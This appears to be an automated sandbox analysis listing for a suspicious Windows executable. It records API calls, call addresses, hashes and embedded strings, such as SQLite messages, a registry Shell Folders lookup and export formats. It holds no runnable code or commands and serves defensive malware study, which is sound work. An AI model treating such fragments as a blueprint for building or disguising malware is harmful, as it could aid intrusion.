                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy$memsetstrlen
                                                      • String ID:
                                                      • API String ID: 2350177629-0
                                                      • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                      • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                      • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                      • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                      • API String ID: 2221118986-1606337402
                                                      • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                      • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                      • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                      • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                      APIs
                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                      • memset.MSVCRT ref: 00408FD4
                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                      • memset.MSVCRT ref: 00409042
                                                      • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                        • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                      • String ID:
                                                      • API String ID: 265355444-0
                                                      • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                      • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                      • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                      • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                      APIs
                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                        • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                        • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                      • memset.MSVCRT ref: 0040C439
                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                      • _wcsupr.MSVCRT ref: 0040C481
                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                      • memset.MSVCRT ref: 0040C4D0
                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                      • String ID:
                                                      • API String ID: 4131475296-0
                                                      • Opcode ID: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                      • Opcode Fuzzy Hash: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                      APIs
                                                      • memset.MSVCRT ref: 004116FF
                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                      • API String ID: 2618321458-3614832568
                                                      • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                      • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AttributesFilefreememset
                                                      • String ID:
                                                      • API String ID: 2507021081-0
                                                      • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                      • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                      APIs
                                                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                      • malloc.MSVCRT ref: 00417524
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                      • free.MSVCRT ref: 00417544
                                                      • free.MSVCRT ref: 00417562
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                      • String ID:
                                                      • API String ID: 4131324427-0
                                                      • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                      • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                      APIs
                                                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                      • free.MSVCRT ref: 0041822B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: PathTemp$free
                                                      • String ID: %s\etilqs_$etilqs_
                                                      • API String ID: 924794160-1420421710
                                                      • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                      • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                      APIs
                                                      • memset.MSVCRT ref: 0040FDD5
                                                        • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                      • _snwprintf.MSVCRT ref: 0040FE1F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                      • API String ID: 1775345501-2769808009
                                                      • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                      • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                      • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                      • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                      APIs
                                                      • wcscpy.MSVCRT ref: 0041477F
                                                      • wcscpy.MSVCRT ref: 0041479A
                                                      • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                      • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: wcscpy$CloseCreateFileHandle
                                                      • String ID: General
                                                      • API String ID: 999786162-26480598
                                                      • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                      • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                      • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                      • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                      • _snwprintf.MSVCRT ref: 0040977D
                                                      • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastMessage_snwprintf
                                                      • String ID: Error$Error %d: %s
                                                      • API String ID: 313946961-1552265934
                                                      • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                      • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: foreign key constraint failed$new$oid$old
                                                      • API String ID: 0-1953309616
                                                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                      • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                      APIs
                                                      Strings
                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy
                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                      • API String ID: 3510742995-272990098
                                                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                      • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                      APIs
                                                      • memset.MSVCRT ref: 0044A6EB
                                                      • memset.MSVCRT ref: 0044A6FB
                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpymemset
                                                      • String ID: gj
                                                      • API String ID: 1297977491-4203073231
                                                      • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                      • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                      APIs
                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                      • free.MSVCRT ref: 0040E9D3
                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??3@$free
                                                      • String ID:
                                                      • API String ID: 2241099983-0
                                                      • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                      • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                      • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                      • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                      APIs
                                                      • AreFileApisANSI.KERNEL32 ref: 00417497
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                      • malloc.MSVCRT ref: 004174BD
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                      • free.MSVCRT ref: 004174E4
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                      • String ID:
                                                      • API String ID: 4053608372-0
                                                      • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                      • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                      APIs
                                                      • GetParent.USER32(?), ref: 0040D453
                                                      • GetWindowRect.USER32(?,?), ref: 0040D460
                                                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Window$Rect$ClientParentPoints
                                                      • String ID:
                                                      • API String ID: 4247780290-0
                                                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                      APIs
                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                      • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                      • memset.MSVCRT ref: 004450CD
                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
